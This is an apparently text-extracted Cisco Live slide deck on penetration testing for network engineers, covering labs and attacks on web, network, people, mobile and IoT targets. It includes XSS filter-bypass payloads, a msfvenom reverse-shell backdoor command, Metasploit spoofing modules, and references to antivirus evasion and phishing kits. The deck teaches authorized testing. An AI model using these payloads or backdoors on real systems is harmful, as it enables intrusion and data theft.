Brksec 2013
Brksec 2013
Brksec 2013
Penetration Testing
For Network
Engineers
Know Yourself and Enemy, Need Not
Fear 100 Battles
Joseph Muniz – Architect Americas
BRKSEC-2013
#CLMEL
Cisco Webex Teams
Questions?
Use Cisco Webex Teams (formerly Cisco Spark)
to chat with the speaker after the session
How
1 Open the Cisco Events Mobile App
2 Find your desired session in the “Session Scheduler”
3 Click “Join the Discussion”
4 Install Webex Teams or go directly to the team space
5 Enter messages/questions in the team space
cs.co/ciscolivebot#BRKSEC-2013
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
Cat And Mouse Game
Time
Powershell
Computer Internet Browser IoT
OS Browser Plugins Phishing
Etc.
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 5
The Evolution of Ransomware Variants NotPetya
Cryptowall SamSam
WannaCry
Crysis
First 73V3N Nemucod
Keranger
CRYZI commercial TeslaCrypt Petya
Jaff
PC Fake Spora
Android phone Cryptolocker Teslacrypt 3.0 Ceber
Cyborg Antivirus Redplus Teslacrypt 4.0 Cryptomix
Virlock Teslacrypt 4.1
Lockdroid
Reveton
1989 2001 2005 2006 2007 2008 2012 2013 2014 2015 2016 2018
CryptoDefense
Koler
GPCoder QiaoZhaz Reveton Kovter Cerber
Ransomlock Simplelock Radamant
Cokri Tox Hydracrypt
Bitcoin CBT-Locker Cryptvault Rokku
TorrentLocker DMALock Jigsaw
network launched Dirty Decrypt Virlock Chimera Powerware
Cryptorbit CoinVault Hidden Tear
Cryptographic Locker Svpeng Lockscreen
Urausy Teslacrypt 2.0
Crypto-Mining
Locky
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
Ransomware Evolution
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
Threats Continue
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
Option 1: Hope You Are Secure
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
Option 2: Validate You Are Secure
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
• Why Use Penetration Testing
Agenda
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
Yeay For Giveaways!
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
Download The CTR Comic
https://tinyurl.com/ycwt2moz
https://tinyurl.com/y6uurzuu
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
Joseph Muniz Technical Security Architect
Security Architect – Americas Sales Organization
Twitter @SecureBlogger
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
Goals For Penetration
Testing
Cybersecurity Goals
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
Persistence Level
Smash n Grab – Automated attacks against anything
vulnerable.
Not targeted
Example Exploit Kits or SPAM
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
Known and Unknown Threats
Known – Attack has been seen and characterised.
Develop signatures for detection
Behaviour triggers
Domains blocked
Antivirus / IPS leverage this
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
Vulnerabilities
• Weakness in system
• Configuration error, missing patch, design flaw, etc.
• Signature security defend attacks (exploiting)
against vulnerabilities. Examples IPS, Anti-Virus
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
Common Vulnerabilities and Exposures (CVE)
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 23
Common Vulnerability Scoring System
Consistent standard for computing vulnerability severity
Examples are version 2 and most used but version 3 is the latest
Access Complexity High (H) = .035 Medium (M) = 0.61 Low (L) = 0.71
Integrity None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
Availability None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
Best of Breed vs Defence in Depth
Capability
Capability Capability
Capability
OR
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
Malware
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
Joey’s Shoes
2.0
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
Joey’s Shoes
2.0
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
Vulnerability Management Current State
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
Recorded Threat
Anomaly Behaviour
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 30
Why Tuning Matters
Vendor Feeds
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 31
Security Operation Centre Services
• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new
capabilities
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 32
Why First Perform a Vulnerability
Assessment Before Pentest?
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 33
Assessment vs Penetration Test
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 34
Credential vs Non-Credential Scanning
Host Scan
Credential
•
• Less load on network
• Considered “Safer Scan”
• Better data
• Network scan
Credential
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 35
SANS - Vulnerability Management
• Triggers
• CVE Identifier may
trigger event
• Assessment tools
• Audits
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 36
• NAC and Profiling can
help with Asset
Inventory
• Triggers
• CVE Identifier may
trigger event
• Assessment tools
• Audits
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
How to Prioritize Risk – COBIT 5 (ISACA)
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 38
Penetration Testing
Penetration Testing Starting Points
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
Statement of Work
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
Get out of Jail Card
• Authorisation in writing
• Signed by the right person
• State risks
• Assign liability to
stakeholder
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
Hack Back Research
Search Youtube – Muniz DEFCON 26
May be illegal
• Use same tactics as attacker!!!
• What damage can you really do?
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 43
Building A Lab
Kali Linux (Also BackBox is good)
Open Source Penetration Testing Arsenal
Many Great Forensics Tools
Download
www.kali.org
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 46
Metasploit
Penetration testing tool used for executing exploit code
against a remote target machine.
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 48
Defense Tools are Similar
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 49
Defense Tools are Similar
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 50
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 51
Sandbox - Cuckoo
https://www.cuckoosandbox.org/
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 52
TrIDNET or PEiD
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 53
Honeypot
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 54
Clonezilla
Real malware
analysis means
bare metal
testing
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 55
VMware
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 56
Vulnerability Scanners
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 57
http://sourceforge.net/projects/owaspbwa/files
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 58
Metasploitable 2
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 59
Simple Lab Example
Vmware Fusion
Kali USB Internet
Option
MAC OSX
Kali
Linux
Windows 200 Gig
7 Mobile
Storage
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 60
The Process
Attack Kill Chain
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 62
Many Targets to Consider
HQ
HQ
Branch Network
Users
Cloud
Data Center
Admin
Roaming Users
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 63
Vectors of an Attack
Physical Digital
• Intel Gather
• Surveil • Scan
• Pick • Assess
• Force • Exploit
• Conceal • Persist
• Persist •
Converged •
Propagate
Exfiltrate
Converged
Attack attacks are most
effective and most
Social difficult to thwart
• Targeted Phishing
• Conning Guards/Staff
• Impersonation
• Phone Phishing
• Create Spies
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 64
Physical Attacks
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 65
USB Script Options
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 66
Lock Picking
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 67
Lock Picking
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 68
Door Cards – Proxmark3
https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 69
Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 70
Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 71
Social Attacks
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 72
Attacking Websites
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 73
Web Recon - Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, average of 26 each
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 74
Web Reconnaissance
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 75
Web Reconnaissance
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 76
Interrogate DNS
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 77
Interrogate DNS (Inside)
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 78
Target Fingerprinting
• ICMP Port unreachable messages
• Banners
• Binaries
• Port Signatures
• Non-standard handshakes
• Response to synfloods
• Packets with non-standard TCP/IP Flags
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 81
Open Ports … Now What?
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 82
OWASP Top 10
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 83
OWASP ZAP
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 84
Bypass & Defeat XXS Filters
Mess with script
<script>alert(123)</script>
<script >alert(123)</script>
<script	>alert(123)</script>
<ScRipT>alert(123)</sCriPt>
<%00script>al%00ert(123)</script> Pseudo-Protocols
<a href="https://www.google.com">Click
Here</a>
Attributes and Tags
<input type="text" name="input" value=”HI">
<input type="text" name="input” value="><script>alert(1)</script>
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 85
XXSer
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 86
Summarising Web Testing
One
Three
Two
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 87
Attacking Networks
Plugging in Networks
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 89
Hacking SNMP
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 90
Attacking SNMP
Onesixtyone – Brute Force with text file
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 91
Viewing Network Data
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 92
Network MiTM
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 93
WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
Defending ????
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 94
WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
Defending
• VPN
• Disable Auto WiFi Connect
• WIDS/WIPS
• Remove HTTP from critical servers
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 95
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless Pretesting Tool
• Can Spoof SSID and performan SSL-Strip
• Cost: $100 - $200 dollars from hack5
Raspberry Pi
• $35 dollar computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration
testing applications
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 96
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless Pretesting Tool
• Can Spoof SSID and performan SSL-Strip
• Cost: $100 - $200 dollars from hack5
Raspberry Pi
• $35 dollar computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration
testing applications
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 97
Responder – LLMNR / NBT-NS / WPAD
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 98
Window - ShareCheck
http://www.sec-1.com/blog/2014/sharecheck
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 99
Exfiltration
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 100
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 101
Attacking People
You can be anybody
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 103
Emily Williams
•Total Connections: 170 Employees,
71 Cisco; 22 NetApp; 10 EMC; 35
McAfee; 300+ Facebook friends
•Endorsements: 22 LinkedIn
Endorsements, For Expertise and
Experience; From Partners and co-
workers
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 104
Speak Like Your Target
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 105
Speak Like Your Target
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 106
Speak Like Your Target
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 107
Phishing / Spear Phishing
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 108
Phishing / Spear Phishing
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 109
Phishing Emails
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 110
Browser Injection Framework (BeEF)
• Hook victim browsers as beachheads for attacks
• Social engineer to click customized link
• Available attacks depend on current browser
vulnerabilities
• Can track hooked systems
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 111
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 112
#CLMEL © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Social Engineering Tool Kit (SET)
• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• Powershell attacks
• And many many more ….
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 114
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 115
Business Email Compromise
Attacker
john@ciscco.com: We
have conference dues to
pay that are late. Pay at
www.hackme.com/dues
Cisco Financial
bob1@cisco.com: Ok
I’m on it!
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 116
Attacking Endpoints
Packing Malware 101
Bypass signature based detection
Payload
(unpacked malware) Changed Less
frequently
Executable
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 118
Weaponize: RAT vs Dropper
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 119
Encoding – Create Backdoor
Metasploit
msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP
LPORT= ANY PORT R> anyname.py
Senna
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 120
Testing Encoding
• Metasploit has encoders but they are detected
• Shelter
• Veil Framework
• Building custom python or powershell connectors
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 121
Testing Encoding
• Metasploit has encoders but they are detected
• Shellter
• Veil Framework
• Building custom python or powershell connectors
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 122
Testing RATs
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 123
Metasploit Framework for Undetectable Malware
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 124
PowerShell Empire
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 125
Example: Phishing Phishers (Magic land)
Step 2: Act stupid - Talk about the matrix and blackhat movie
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 126
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 127
Privilege Escalation
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 128
Password Cracking Concepts
• BIOS – Try manufacture password
• Guessing or Recovering a password
(admin | password | cisco | blank | vender name)
• Dictionary / Rainbow Tables
• Man-in-the-middle
• Attacking encryption
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 129
Lots of Password Cracking Tools
• Hashcat - cracking hashes tool
• RainbowCrack - Hash cracker tool, Windows/Linux based
• Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS,
LDAP,etc)
• Cain and Able - Few features of password cracking ability
• John the Ripper - Offline mode, auto hash password type detector,
• THC Hydra - Dictionary attack tool for many databases, over 30
protocols
• AirCrack-NG - WEP and WPA-PSK keys cracking
• OphCrack / Medusa / L0phtCrack / Etc. ……
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 130
CeWL
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 131
Attacking Mobile
Devices
Always Research
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 133
Phones: MAC OSX
• iOS Snapshots
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 134
Phones: Android
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 135
Example Reading SMS
+------------------------------------------------------------------------
-----------------------------------------+
| date | date_sent | person | body
|
|------------------------------------------------------------------------
------------------------------------------
| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54 | Hello Randy!
Where should I send my Cisco live presentation? |
| 2017-10-20 16:34:03 | 2017-01-01 02:00:00 | | Damn, thanks ! for
texting jet |
| 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54 | Jet? When you
are a Jet, you’re a jet? West Side?? |
| Stupid auto correct! | I’m going to dropkick you Joey ... And this phone
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 136
What is Root for Android?
Models You Won’t Root
Google Pixel or Pixel XL (Verizon variant)
Google Pixel 2 or Pixel 2 XL (Verizon variant) Requires root access to modify
Samsung Galaxy S7 (US variants)
Samsung Galaxy S7 Edge (US variants)
Samsung Galaxy S8 (US variants) Root directory
Samsung Galaxy S8+ (US variants) System
Samsung Galaxy Note 8 (US variants)
Samsung Galaxy S9 (US variants)
Samsung Galaxy S9+ (US variants)
Data
Samsung Galaxy Note 9 (US variants)
SD CARD
Downloads
Good Targets
Pictures
Google Nexus 6P
OnePlus 3 or 3T Accessible by default
OnePlus 5
OnePlus 6
Google Nexus 7 (2012 or 2013)
Google Pixel or Pixel XL
Google Pixel 2 or Pixel 2XL
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 137
Brute Force PINs
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 138
Many Commercial Tools Available
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 139
Accessing Unauthorized Voicemail
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 140
Testing IoT
Hacking IoT
Lightbulbs
Conference Blinky Things
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 142
Hacking IoT
Lightbulbs
Conference Blinky Things
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 143
IoT Recon
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 144
IoT Firmware
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 145
IoT Hardware Hacking
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 146
Radio Interfaces
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 147
Reporting
Language is Everything
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 149
Penetration Testing Report
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 150
Penetration Testing Report - Details
Vulnerabilities – What you found
Impact – Potential damage
Likelihood – How hard to execute
Risk evaluation – Impact to business
Recommendation – Remediation steps
References – Who worked on what
Additional details – Appendices, Glossary, Tools used, etc.
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 151
Remember …. Cybersecurity Goals
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 152
•Wrap up
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 153
Threats will increase.
Volume and sophistication.
Next Steps
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 155
Security is a Journey, Not a destination
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 156
Q&A
#CLMEL
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 158
Complete Your Online Session Evaluation
#CLMEL © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Thank you
#CLMEL
#CLMEL